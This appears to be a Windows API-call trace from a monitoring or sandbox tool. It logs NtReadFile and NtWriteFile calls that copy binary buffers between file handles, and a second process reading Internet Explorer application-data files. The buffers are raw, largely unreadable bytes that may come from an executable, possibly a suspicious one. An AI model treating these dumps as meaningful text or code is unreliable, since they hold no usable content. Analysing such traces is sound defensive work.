Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,488 | 364 | NtReadFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,528 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Internet Explorer\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:02,528 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01\xa0-Yx\xe4\x91\xcf\x01\xf0C.\xbc\xd5I\xcd\x01\xf0C.\xbc\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdax\x00\x00\x00\x00\x00\x00\x00\xf0<i\xb9\xd5I\xcd\x01\x80\x92\x8a\xbf\xd5I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\xf0<i\xb9\xd5I\xcd\x01\x8d\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00r\x00n\x00d\x00l\x00o\x00g\x00.\x00b\x00a\x00k\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\x90a\x9b\xbf\xd5I\xcd\x01\x90a\x9b\xbf\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:02,528 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Internet Explorer\brndlog.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,558 | 504 | NtReadFile |
Buffer => 06/13/2012 14:31:05 NoClear flag is specified.
06/13/2012 14:31:05 COM initialized with S_OK success code.
06/13/2012 14:31:05 Branding Internet Explorer...
06/13/2012 14:31:05 Command line is "/mode:isp /peruser".
06/13/2012 14:31:05 Global b FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtWriteFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtReadFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtWriteFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtReadFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtWriteFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtReadFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,578 | 364 | NtWriteFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtReadFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtWriteFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtReadFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtWriteFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtReadFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtWriteFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtReadFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,588 | 364 | NtWriteFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtReadFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtWriteFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtReadFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtWriteFile |
